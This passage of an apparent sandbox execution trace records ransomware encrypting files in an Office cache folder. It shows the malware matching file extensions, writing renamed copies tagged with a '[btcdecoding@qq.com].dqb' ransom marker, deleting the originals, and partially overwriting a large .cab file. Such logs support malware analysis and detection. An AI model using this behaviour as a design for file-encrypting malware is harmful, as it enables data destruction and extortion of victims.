Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.576] lstrlenW (lpString=".jpg") returned 4 [0048.577] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.577] lstrlenW (lpString=".doc") returned 4 [0048.577] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString=".docx") returned 5 [0048.577] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.577] lstrlenW (lpString=".pdf") returned 4 [0048.577] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString=".xls") returned 4 [0048.577] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString=".xlsx") returned 5 [0048.577] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.577] lstrlenW (lpString=".ppt") returned 4 [0048.577] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.577] lstrlenW (lpString=".zip") returned 4 [0048.577] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString=".rar") returned 4 [0048.577] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString=".bz2") returned 4 [0048.577] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString=".7z") returned 3 [0048.577] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.577] lstrlenW (lpString=".dbf") returned 4 [0048.577] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.577] lstrlenW (lpString=".1cd") returned 4 [0048.577] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.577] lstrlenW (lpString=".jpg") returned 4 [0048.577] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.578] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0048.578] lstrlenW (lpString="ose.exe") returned 7 [0048.578] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0048.883] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=174440) returned 1 [0048.883] CloseHandle (hObject=0x204) returned 1 [0048.883] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0048.883] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.883] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0048.883] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.883] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.883] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0048.883] GetLastError () returned 0x0 [0048.883] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x2a968, lpOverlapped=0x0) returned 1 [0048.887] WriteFile (in: hFile=0x160, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0048.891] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.891] WriteFile (in: hFile=0x160, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0048.891] SetEndOfFile (hFile=0x160) returned 1 [0048.891] CloseHandle (hObject=0x160) returned 1 [0048.891] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.891] SetEndOfFile (hFile=0x204) returned 1 [0048.893] CloseHandle (hObject=0x204) returned 1 [0048.893] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0048.893] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.893] lstrlenW (lpString=".doc") returned 4 [0048.894] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.894] lstrlenW (lpString=".docx") returned 5 [0048.894] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.894] lstrlenW (lpString=".pdf") returned 4 [0048.894] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.894] lstrlenW (lpString=".xls") returned 4 [0048.894] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.894] lstrlenW (lpString=".xlsx") returned 5 [0048.894] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.894] lstrlenW (lpString=".ppt") returned 4 [0048.894] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.894] lstrlenW (lpString=".zip") returned 4 [0048.894] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.894] lstrlenW (lpString=".rar") returned 4 [0048.894] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.894] lstrlenW (lpString=".bz2") returned 4 [0048.894] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.894] lstrlenW (lpString=".7z") returned 3 [0048.894] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.894] lstrlenW (lpString=".dbf") returned 4 [0048.894] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.894] lstrlenW (lpString=".1cd") returned 4 [0048.894] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.894] lstrlenW (lpString=".jpg") returned 4 [0048.894] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.894] lstrlenW (lpString=".doc") returned 4 [0048.894] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.894] lstrlenW (lpString=".docx") returned 5 [0048.894] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.894] lstrlenW (lpString=".pdf") returned 4 [0048.895] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.895] lstrlenW (lpString=".xls") returned 4 [0048.895] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.895] lstrlenW (lpString=".xlsx") returned 5 [0048.895] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.895] lstrlenW (lpString=".ppt") returned 4 [0048.895] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.895] lstrlenW (lpString=".zip") returned 4 [0048.895] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.895] lstrlenW (lpString=".rar") returned 4 [0048.895] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.895] lstrlenW (lpString=".bz2") returned 4 [0048.895] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.895] lstrlenW (lpString=".7z") returned 3 [0048.895] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.895] lstrlenW (lpString=".dbf") returned 4 [0048.895] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.895] lstrlenW (lpString=".1cd") returned 4 [0048.895] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.895] lstrlenW (lpString=".jpg") returned 4 [0048.895] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.895] lstrcmpiW (lpString1=".xrm-ms", lpString2=".dqb") returned 1 [0048.895] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0048.895] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0048.896] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=715834) returned 1 [0048.896] CloseHandle (hObject=0x204) returned 1 [0048.896] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0048.896] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.896] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0048.896] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.896] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.896] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0048.896] GetLastError () returned 0x0 [0048.896] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0048.912] WriteFile (in: hFile=0x160, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0048.925] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.925] WriteFile (in: hFile=0x160, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x104, lpOverlapped=0x0) returned 1 [0048.925] SetEndOfFile (hFile=0x160) returned 1 [0048.925] CloseHandle (hObject=0x160) returned 1 [0048.925] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.925] SetEndOfFile (hFile=0x204) returned 1 [0049.134] CloseHandle (hObject=0x204) returned 1 [0049.134] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0049.134] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0049.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.275] lstrlenW (lpString=".doc") returned 4 [0049.275] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString=".docx") returned 5 [0049.276] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0049.276] lstrlenW (lpString=".pdf") returned 4 [0049.276] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString=".xls") returned 4 [0049.276] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString=".xlsx") returned 5 [0049.276] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0049.276] lstrlenW (lpString=".ppt") returned 4 [0049.276] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.276] lstrlenW (lpString=".zip") returned 4 [0049.276] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString=".rar") returned 4 [0049.276] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString=".bz2") returned 4 [0049.276] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString=".7z") returned 3 [0049.276] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0049.276] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.276] lstrlenW (lpString=".dbf") returned 4 [0049.276] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.276] lstrlenW (lpString=".1cd") returned 4 [0049.276] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.276] lstrlenW (lpString=".jpg") returned 4 [0049.276] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.276] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.276] lstrlenW (lpString=".doc") returned 4 [0049.276] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0049.276] lstrlenW (lpString=".docx") returned 5 [0049.277] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0049.277] lstrlenW (lpString=".pdf") returned 4 [0049.277] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString=".xls") returned 4 [0049.277] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString=".xlsx") returned 5 [0049.277] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0049.277] lstrlenW (lpString=".ppt") returned 4 [0049.277] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.277] lstrlenW (lpString=".zip") returned 4 [0049.277] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString=".rar") returned 4 [0049.277] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString=".bz2") returned 4 [0049.277] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString=".7z") returned 3 [0049.277] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0049.277] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.277] lstrlenW (lpString=".dbf") returned 4 [0049.277] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.277] lstrlenW (lpString=".1cd") returned 4 [0049.277] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0049.277] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.277] lstrlenW (lpString=".jpg") returned 4 [0049.277] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0049.277] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0049.277] lstrlenW (lpString="VisiorWW.cab") returned 12 [0049.278] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0050.375] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=195011319) returned 1 [0050.375] CloseHandle (hObject=0x224) returned 1 [0050.375] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab")) returned 0x2020 [0050.375] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.375] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0050.376] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0050.376] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0050.376] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.376] ReadFile (in: hFile=0x224, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.382] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.382] ReadFile (in: hFile=0x224, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.385] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.385] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.385] ReadFile (in: hFile=0x224, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.400] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.400] WriteFile (in: hFile=0x224, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0050.811] SetEndOfFile (hFile=0x224) returned 1 [0050.811] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0050.815] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.815] WriteFile (in: hFile=0x224, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.816] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.816] WriteFile (in: hFile=0x224, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.819] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.819] WriteFile (in: hFile=0x224, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, 